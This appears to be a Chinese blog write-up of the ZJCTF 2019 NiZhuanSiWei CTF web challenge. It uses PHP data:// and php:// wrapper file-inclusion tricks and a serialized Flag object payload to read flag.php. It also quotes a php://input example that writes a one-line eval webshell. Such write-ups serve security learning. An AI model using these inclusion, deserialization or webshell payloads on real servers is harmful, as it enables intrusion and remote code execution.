[ZJCTF 2019]NiZhuanSiWei 1

最新推荐文章于 2022-09-25 09:50:06 发布
最新推荐文章于 2022-09-25 09:50:06 发布
阅读量1.7k 收藏
点赞数
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dlccom/article/details/124428141
版权
  • 继续摸鱼

  • text传参,要在文件中,内容welcome to the zjctf,试了几个php伪协议
  • 发现data协议可以写入payload:
  • ​
http://7cee05d2-80a4-486f-baae-1067318b3874.node4.buuoj.cn:81/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

​
    • data:// 协议条件:
      • allow_url_include :on
      • allow_url_fopen:on
    • 作用:自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。
  • 跳转到下一个页面

  • 后面也没啥有用的信息了,试试php:// 协议能读到什么
  • php:// 协议示例:
    • 2.php://input + [POST DATA]执行php代码
      • 若有写入权限,写入一句话木马
        • http://127.0.0.1/include.php?file=php://input
        • [POST DATA部分]
        • <?php fputs(fopen('1juhua.php','w'),'<?php@eval($_GET[cmd]); ?>'); ?>
  • 有个BASE64加密字符串

  • 解密看看
  • <?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

  • 应该是flag.php的源码,结合上面的反序列化我们要序列化一下

    payload: 
    ​

http://cb8c0c1c-fa27-4281-b66a-3305a1e60e3a.node4.buuoj.cn:81/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}&file=useless.php
​

  • 拿到flag

咸鱼一方
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ZJCTF 2019]NiZhuanSiWei
brainw的博客
04-22 2605
[ZJCTF 2019]NiZhuanSiWei 代码审计 查看一下useless.php --只有注释信息 没有用 利用data协议绕过 将welcome to the zjctf写入 而data://协议允许读入 payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了 只有看下wp了 正则判断...
[ZJCTF 2019]NiZhuanSiWei1
evil_ming的博客
04-23 254
一看就是代码审计啊。打开useless.php 发现空白就想用base64编码来查看。 用个在线php编码的来序列化 构造payload之后访问源码得到flag text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;} over. ...
BUUCTF-PWN-[ZJCTF 2019]Login
最新发布
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
web buuctf [ZJCTF 2019]NiZhuanSiWei1
weixin_44214568的博客
03-14 1270
一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 , php伪协议是基于文件包含的,文件包含有本地包含和远程包含, 当包含的文件在远程服务器上时,就形成了远程文件包含。 远程文件包含需要在 php.ini 中设置: allow_url_include = on(是否允许 include/require 远程文件) allow_url_fopen = on(是否允许打开远程文件) php伪协议是php支持的协议和封装协议 贴(我从...
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
biggerpig的博客
09-25 947
BUUCTF web类型题目[ZJCTF 2019]NiZhuanSiWei1详解
魔术方法总结
梦里不知身是客
12-26 9843
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
[ZJCTF 2019]NiZhuanSiWei 1学习笔记
weixin_45869407的博客
10-12 1345
刚刚做了一下PHP的代码审计,原以为自己能够做出来,果然还是练习不够,看到text就以为直接传参就OK了,结果试了半天不行,看大佬writeup才发现原来要通过PHP伪协议来传参。 首先看到的是text的参数,它使用了file_get_contents()函数,说明就需要传入文件类型的数据,但text是GET,所以这里就要使用伪协议data。 这里对伪协议的描述挺好的 可以从表上看出,data有4种方式,这里我使用/?text=data://text/plain;base64,d2VsY29tZSB0b
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3189
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值